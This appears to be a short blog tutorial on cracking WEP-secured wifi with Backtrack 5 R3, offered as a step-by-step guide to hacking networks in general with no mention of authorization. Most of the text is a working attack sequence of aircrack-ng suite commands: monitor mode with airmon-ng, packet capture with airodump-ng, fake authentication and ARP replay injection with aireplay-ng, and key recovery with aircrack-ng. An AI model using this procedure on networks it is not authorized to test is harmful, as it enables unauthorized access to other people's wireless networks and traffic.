How to Hack WEP secured wifi with Backtrack 5 R3

How to Hack WEP secured wifi with Backtrack 5 R3 :-


Overview :- 
                      Hacking WEP secured wifi is very easy.You got a backtrack live cd with a wireless card compatible and you hack WEP wifi with no worry.This is becuase WEP security is very old now a days WPA/WPA2 security are available these securities can also be cracked ;) but with very difficulty.I will also teach you How to hack WPA/WPA2 security but first our tutorial is How to hack WEP security with backtrack 5 R3.For this purpose you should have....
Procedure :- 
STEP # 1 :- First log into backtrack and open a terminal....
  STEP # 2 :- Now first check if your adapter is connected to backtrack or not type...
"root@bt:~ airmon-ng "... you will see your adapter in my case it is "wlan0"..
Note : "eth0" is ethernet adapter....


STEP # 3 :- If you don't find your adapter you have to connect it using vm-ware tools.... located on the bottom of the bar...Click on usb icon and click on "Connect (Disconnect from host)"..
STEP # 4 :- Now to put your adapter in monitor mode  type....
"root@bt:~ airmon-ng start (interface)"...
Note: Interface in my case is "wlan0"..
STEP # 5 :- Now start "airodump" by typing...
"root@bt:~ airodump-ng mon0"...
Note : "mon0" is available when you have enabled monitor mode...
 Here bssid is the id of router and below station is MAC address of computer.CH is the channel and PWR is power or strength of signal.If it is less in number it means you are very close to router i-e the signal is strong.Data is the collected packets this is what we need.ENC is the encryption type for example WEP.

STEP  # 6 :- Now type the following command...
"root@bt:~ airodump-ng --bssid -c -w mon0"
Here :-
  • -bssid is the id of router...
  • -c is the channel
  • -w is the name which you want to store captured packets


STEP # 7 :- Now you should see the numbers in "#Data" We want to increase it to "60,000".If it reaches to this amount we will be able to crack WEP 100% correctly.Don't worry it will not take your time less then 10 minutes if you type this command in other console....
"root@bt:~ aireplay-ng -1 0 -e (essid) -a (bssid) mon0" if you see a smile :-) it means you are done
  • here essid is the title of router..
  • bssid is the id of router in this form "xx:xx:xx:xx:xx:xx".
 

STEP # 8 :- Now type this command also...
"root@bt:~ aireplay-ng -3 -b (bssid) mon0"



STEP # 9 :- Now when  the "#Data" reaches to "60,000" type the following command...
"root@bt:~ aircrack-ng *.cap".... Wait until it cracks your WEP key..
 

STEP # 10 :- Cracked key will look like this........... Enjoy...


Thanks for reading and your time.....

0 comments: